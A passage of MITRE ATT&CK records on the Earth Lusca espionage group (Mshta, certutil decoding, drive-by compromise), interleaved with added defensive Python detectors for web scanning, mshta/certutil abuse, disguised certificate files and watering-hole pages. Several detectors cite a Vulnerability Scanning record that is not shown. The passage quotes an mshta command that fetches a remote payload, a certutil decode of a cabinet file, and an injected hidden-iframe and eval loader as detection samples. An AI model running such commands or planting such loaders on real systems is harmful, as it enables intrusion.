description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
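The Vulnerability Scanning entry above, like the Exploit Public-Facing Application entry before it, describes the attacker side: banners and paths are probed to find a product and version worth exploiting. On the server side those probes leave a recognisable trace, namely one client hammering product-specific paths that do not exist on the site, a high share of 4xx responses, and scanner tooling in the User-Agent. The following added example (not code from the page, the ATT&CK project or the Trend Micro report) scores clients on those three signals over access log lines in combined format. The log lines are constructed; the probe path list and the thresholds are illustrative assumptions to be tuned per site (the `/owa/` and `/ecp/` paths are Exchange front ends, the rest are common product probes).

```python
"""Spot vulnerability scanning of a public-facing web server in its access log.

Added example, not from the ATT&CK page or the Trend Micro report.
Log lines are constructed in Apache/nginx combined format; thresholds are illustrative.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Paths that make sense only when probing for a product, not when using this site
PROBE_PATHS = ("/owa/", "/ecp/", "/autodiscover/", "/console/", "/management/",
               "/.env", "/.git/", "/wp-login.php", "/phpmyadmin")
# Substrings of User-Agent strings that identify scanning tools
SCANNER_UA = ("nmap", "nikto", "masscan", "sqlmap", "nuclei", "zgrab", "python-requests")

SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2022:09:12:01 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"
198.51.100.7 - - [01/Mar/2022:09:12:01 +0000] "GET /ecp/ HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"
198.51.100.7 - - [01/Mar/2022:09:12:02 +0000] "GET /console/ HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"
198.51.100.7 - - [01/Mar/2022:09:12:02 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"
198.51.100.7 - - [01/Mar/2022:09:12:03 +0000] "GET /management/ HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"
203.0.113.9 - - [01/Mar/2022:09:15:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.9 - - [01/Mar/2022:09:15:11 +0000] "GET /style.css HTTP/1.1" 200 812 "http://www.example.org/" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.9 - - [01/Mar/2022:09:15:40 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_scanners(log_text, min_requests=4, error_ratio=0.75, min_probes=2):
    """Score each client IP on its share of 4xx responses, the number of distinct
    probe paths it hit, and scanner tooling in its User-Agent.
    Returns {ip: [reasons]} for every client with at least one reason."""
    stats = defaultdict(lambda: {"total": 0, "errors": 0, "probes": set(), "uas": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        s = stats[rec["ip"]]
        s["total"] += 1
        if rec["status"].startswith("4"):
            s["errors"] += 1
        if any(rec["path"].startswith(p) for p in PROBE_PATHS):
            s["probes"].add(rec["path"])
        s["uas"].add(rec["ua"].lower())

    flagged = {}
    for ip, s in stats.items():
        reasons = []
        if s["total"] >= min_requests and s["errors"] / s["total"] >= error_ratio:
            reasons.append(f"{s['errors']}/{s['total']} requests returned 4xx")
        if len(s["probes"]) >= min_probes:
            reasons.append(f"{len(s['probes'])} product-probe paths requested")
        tools = [t for t in SCANNER_UA if any(t in ua for ua in s["uas"])]
        if tools:
            reasons.append("scanner user-agent: " + ", ".join(tools))
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in find_scanners(SAMPLE_LOG).items():
        print(ip, reasons)
```

The ordinary visitor in the sample misses one favicon and is not flagged; the scanning client trips all three signals. In production the User-Agent signal is the weakest, since it is trivially spoofed, so weight the path and error-ratio signals higher and feed confirmed scanner sources into the rate-limiting or blocking layer in front of the application.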
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a3627d9d-1c78-4b10-8b1c-3183a939862b revoked : False technique : Mshta technique_description : Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: `mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))` They may also be executed directly from URLs: `mshta http[:]//webserver/payload[.]hta` Mshta.exe can be used to bypass application control solutions that do not account for its potential use. 
Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1218.005 matrix : mitre-attack platform : ['Windows'] data_sources : ['Process: Process Creation', 'File: File Creation', 'Command: Command Execution', 'Network Traffic: Network Connection Creation'] permissions_required : ['User'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [certutil](https://attack.mitre.org/software/S0160) to decode a string into a cabinet file.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--52a5b303-b759-424e-86b8-5c855976e5ea revoked : False technique : Deobfuscate/Decode Files or Information technique_description : Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods include built-in malware functionality or utilities already present on the system. One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows `copy /b` command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open the file for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password-protected compressed/encrypted file that was provided by the adversary. 
(Citation: Volexity PowerDuke November 2016) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1140 matrix : mitre-attack platform : ['Windows', 'Linux', 'macOS'] data_sources : ['Process: Process Creation', 'Script: Script Execution', 'File: File Modification'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has performed watering hole attacks.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--29a1fc8a-58c3-4465-b170-d9ec7c2d4d22 revoked : False technique : Drive-by Compromise technique_description : Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
   * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
   * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. 
These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')] technique_id : T1189 matrix : mitre-attack platform : ['Windows', 'Linux', 'macOS', 'SaaS'] data_sources : ['Application Log: Application Log Content', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'File: File Creation', 'Network Traffic: Network Connection Creation'] ----------------------------------------------------------------------------------------------------
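Added example for the Vulnerability Scanning (T1595.002) record above, on the defender's side of the "Network Traffic Content" data source it lists. This is illustrative code written for this page, not tooling from MITRE, Trend Micro or Recorded Future: it parses combined-format web server access logs and flags clients that either announce themselves with a scanner User-Agent or enumerate many distinct paths in a short window while mostly receiving 404s, which is what banner and version probing looks like from the server. The log lines, IP addresses, thresholds and the User-Agent marker list are constructed assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the Apache/nginx "combined" access log format. All sample lines below are
# constructed for this example; they are not traffic from any real host.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# User-Agent fragments of common scanners. Illustrative assumption: tune from your own telemetry.
SCANNER_UA_MARKERS = ("nikto", "nmap", "masscan", "nuclei", "sqlmap", "nessus", "acunetix", "zgrab")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_scanners(lines, window=timedelta(minutes=5), min_distinct_paths=15, min_404_ratio=0.6):
    """Return {source_ip: [reasons]} for clients that look like vulnerability scanners.

    Two signals: a self-identifying scanner User-Agent, or enumeration of many distinct
    paths inside `window` where most responses are 404 (probing for software that is
    not installed). The thresholds are assumptions chosen for the example.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        reasons = set()
        if any(marker in r["ua"].lower() for r in recs for marker in SCANNER_UA_MARKERS):
            reasons.add("scanner user-agent")
        # Sliding time window over the client's requests, oldest to newest.
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            win = recs[start:end + 1]
            if len({r["path"] for r in win}) >= min_distinct_paths:
                not_found = sum(1 for r in win if r["status"] == 404) / len(win)
                if not_found >= min_404_ratio:
                    reasons.add("path enumeration with high 404 ratio")
                    break
        if reasons:
            findings[ip] = sorted(reasons)
    return findings


def _mk(ip, second, path, status, ua="Mozilla/5.0 (Windows NT 10.0) Firefox/102.0"):
    """Build one constructed log line (all timestamps fall on 01/Jul/2022 10:00)."""
    return f'{ip} - - [01/Jul/2022:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample: 203.0.113.10 walks a wordlist of admin/config paths and gets 404s,
# 198.51.100.7 announces itself as Nikto, 192.0.2.55 is an ordinary visitor.
PROBED_PATHS = ["/phpmyadmin/", "/admin/", "/.env", "/wp-login.php", "/server-status",
                "/.git/config", "/cgi-bin/test.cgi", "/console/", "/manager/html",
                "/actuator/health", "/api/v1/", "/backup.zip", "/config.php",
                "/login.jsp", "/xmlrpc.php", "/.svn/entries"]
SAMPLE_LOG = (
    [_mk("203.0.113.10", i, p, 404) for i, p in enumerate(PROBED_PATHS)]
    + [_mk("198.51.100.7", 30, "/", 200, ua="Mozilla/5.0 (compatible; Nikto/2.1.6)")]
    + [_mk("192.0.2.55", 40, "/", 200), _mk("192.0.2.55", 41, "/about", 200)]
)

if __name__ == "__main__":
    for ip, why in detect_scanners(SAMPLE_LOG).items():
        print(ip, ", ".join(why))
```

The 404-ratio signal is the one worth keeping: a scanner that spoofs a browser User-Agent still has to ask for paths that do not exist on your server, and an ordinary visitor rarely produces fifteen distinct misses in five minutes.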
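Added example for the Mshta (T1218.005) and Deobfuscate/Decode Files or Information (T1140) records above, both of which list "Process: Process Creation" and "Command: Command Execution" as data sources. This is illustrative detection logic written for this page, not a rule published by MITRE, Trend Micro or Recorded Future. It triages process-creation events for the patterns those records describe: mshta.exe launched with a protocol-handler inline script or a remote URL, mshta.exe given a .lnk file as its argument (the Earth Lusca case, where the HTA content travels inside the shortcut), mshta.exe spawned by an Office application, and certutil.exe used with -decode where the output file is not a certificate. The events, file paths and parent-process list are constructed assumptions.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 / EDR telemetry.
# Paths and file names are invented for the example; none is an indicator from the report.
EVENTS = [
    {   # A user double-clicked a shortcut that launches mshta with the .lnk itself as argument
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": r'mshta.exe "C:\Users\victim\Downloads\invoice.lnk"',
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {   # The inline-script form quoted in the technique description, launched from Word
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": 'mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))',
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # certutil turning a text blob back into a cabinet file
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil -decode C:\Users\Public\update.txt C:\Users\Public\update.cab",
        "parent_image": r"C:\Windows\System32\cmd.exe",
    },
    {   # Legitimate administrative use: nothing should fire
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil -verify C:\certs\server.cer",
        "parent_image": r"C:\Windows\System32\cmd.exe",
    },
]

CERT_EXTENSIONS = (".cer", ".crt", ".pem", ".der", ".p7b", ".pfx")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_mshta(tokens, parent_image):
    """Signals for T1218.005: protocol-handler inline scripts, remote HTAs,
    HTA content carried inside a .lnk, and Office applications spawning mshta."""
    reasons = []
    args = " ".join(tokens[1:]).lower()
    if re.search(r"\b(vbscript|javascript):", args):
        reasons.append("inline script via protocol handler")
    if re.search(r"https?://", args):
        reasons.append("HTA fetched from remote URL")
    if any(t.lower().endswith(".lnk") for t in tokens[1:]):
        reasons.append("HTA content loaded from a .lnk file")
    parent = basename(parent_image)
    if parent in OFFICE_PARENTS:
        reasons.append("spawned by Office application " + parent)
    return reasons


def check_certutil(tokens):
    """Signals for T1140: certutil used as a decoder, especially when the output is not a certificate."""
    reasons = []
    switches = [t.lower().lstrip("-/") for t in tokens[1:] if t.startswith(("-", "/"))]
    positionals = [t for t in tokens[1:] if not t.startswith(("-", "/"))]
    if "decode" in switches or "decodehex" in switches:
        reasons.append("certutil used as a base64/hex decoder")
        # certutil -decode InFile OutFile: the last positional is the file it writes
        if positionals and not positionals[-1].lower().endswith(CERT_EXTENSIONS):
            reasons.append("decoded output is not a certificate file: " + positionals[-1])
    return reasons


def triage(event):
    """Return the reasons a process-creation event deserves a look (empty list if none)."""
    tokens = tokenize(event["command_line"])
    image = basename(event["image"])
    if image == "mshta.exe":
        return check_mshta(tokens, event.get("parent_image", ""))
    if image == "certutil.exe":
        return check_certutil(tokens)
    return []


if __name__ == "__main__":
    for ev in EVENTS:
        print(basename(ev["image"]), "->", triage(ev) or "clean")
```

The .lnk check is the narrowest and therefore the quietest signal: mshta.exe has no legitimate reason to be handed a shortcut file, whereas a local .hta path on its own is common enough in enterprise software that it is not flagged here.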
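Added example for the Deobfuscate/Decode Files or Information (T1140) record above, which describes certutil decoding a payload "hidden inside a certificate file" and Earth Lusca decoding a string into a cabinet file. This is illustrative code written for this page, not from MITRE or Trend Micro. It reproduces what `certutil -decode` does to a PEM-armored file (strip the header and footer, base64-decode the body) and then asks the only question that matters for triage: are the decoded bytes an ASN.1 certificate, or a cabinet, PE or archive wearing a certificate's clothes? The two sample files are constructed inline; the CAB and DER headers are truncated stand-ins, not real files.

```python
import base64
import re

PEM_RE = re.compile(r"-----BEGIN [^-]+-----(.*?)-----END [^-]+-----", re.S)

# File-type signatures checked against the decoded bytes. A real DER certificate is an
# ASN.1 SEQUENCE and therefore starts with 0x30; the others are payload containers.
SIGNATURES = (
    (b"MSCF", "cab"),        # Microsoft Cabinet, the container Earth Lusca decoded
    (b"MZ", "pe"),           # DOS/PE executable
    (b"PK\x03\x04", "zip"),
    (b"\x30", "der"),        # ASN.1 SEQUENCE: an actual X.509 certificate
)


def armor(blob, label="CERTIFICATE"):
    """Wrap bytes the way `certutil -encode` does: PEM header/footer around 64-column base64."""
    b64 = base64.b64encode(blob).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN %s-----\n%s\n-----END %s-----\n" % (label, "\n".join(lines), label)


def decode_certutil_style(text):
    """Mimic `certutil -decode`: drop the PEM armor if present, ignore whitespace, base64-decode."""
    m = PEM_RE.search(text)
    body = m.group(1) if m else text
    return base64.b64decode(re.sub(r"\s+", "", body), validate=True)


def classify(blob):
    """Name the container type by its leading bytes, or 'unknown'."""
    for magic, kind in SIGNATURES:
        if blob.startswith(magic):
            return kind
    return "unknown"


def inspect_certificate_file(text):
    """Decode a supposed certificate file and report what the bytes actually are."""
    blob = decode_certutil_style(text)
    kind = classify(blob)
    return {"kind": kind, "is_certificate": kind == "der", "size": len(blob)}


# Constructed samples: a truncated CAB header (magic "MSCF", then zeroed header fields) and a
# stand-in for a DER certificate prefix (SEQUENCE, long-form length). Neither is a real file.
FAKE_CAB = b"MSCF" + bytes(32)
FAKE_DER = b"\x30\x82\x03\x20" + bytes(28)
DISGUISED_CAB_FILE = armor(FAKE_CAB)
GENUINE_LOOKING_CERT = armor(FAKE_DER)

if __name__ == "__main__":
    print(inspect_certificate_file(DISGUISED_CAB_FILE))
    print(inspect_certificate_file(GENUINE_LOOKING_CERT))
```

The check is cheap enough to run on every file a certutil -decode writes, or on any .cer/.crt dropped into a user-writable directory: a PEM block whose body does not decode to a SEQUENCE is not a certificate, whatever its extension says.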
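Added example for the Drive-by Compromise (T1189) record above, from the point of view of a site owner checking whether their pages have become a watering hole. This is illustrative code written for this page, not from MITRE, Trend Micro or Recorded Future. It walks a page's HTML and reports the injection patterns the record lists: scripts and frames loaded from origins outside an allowlist, externally hosted scripts with no Subresource Integrity hash (the bucket-modification case has no defence without one), hidden iframes, and inline scripts using eval/unescape-style loaders. The sample page, the origin names and the obfuscation marker list are constructed assumptions; the integrity value in the sample is a placeholder, not a real digest.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Strings that rarely appear in hand-written page scripts but are typical of injected loaders.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")


class PageAuditor(HTMLParser):
    """Walk a page's HTML and record injected-content signals: scripts or frames from origins
    not on the allowlist, externally hosted scripts with no Subresource Integrity hash,
    hidden iframes, and inline scripts that look obfuscated."""

    def __init__(self, allowed_origins):
        super().__init__()
        self.allowed = {o.lower() for o in allowed_origins}
        self.findings = []
        self._inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            src = a.get("src")
            self._inline_script = src is None
            if src:
                self._check_origin(src, "script")
                if urlparse(src).netloc and "integrity" not in a:
                    self.findings.append(("script-without-sri", src))
        elif tag == "iframe":
            src = a.get("src", "")
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if "display:none" in style or "visibility:hidden" in style or tiny:
                self.findings.append(("hidden-iframe", src))
            elif src:
                self._check_origin(src, "iframe")

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline_script = False

    def handle_data(self, data):
        # Script bodies arrive here as CDATA; only inline scripts are checked for obfuscation.
        if self._inline_script and any(m in data for m in OBFUSCATION_MARKERS):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))

    def _check_origin(self, src, kind):
        origin = urlparse(src).netloc.lower()
        if origin and origin not in self.allowed:
            self.findings.append(("unexpected-%s-origin" % kind, origin))


def audit_page(html, allowed_origins):
    """Return a list of (finding, detail) tuples for the given HTML; empty means clean."""
    auditor = PageAuditor(allowed_origins)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed page: the site's own CDN script is pinned with SRI (digest is a placeholder);
# the rest is the kind of content a watering-hole compromise injects.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.com/app.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://public-bucket.example.net/lib.js"></script>
</head><body>
<h1>Ministry news</h1>
<iframe src="https://203.0.113.5/l.php" width="1" height="1" style="display:none"></iframe>
<script>var p=unescape("%64%6f%63");eval(p);</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_PAGE, ["cdn.example.com"]):
        print(kind, detail)
```

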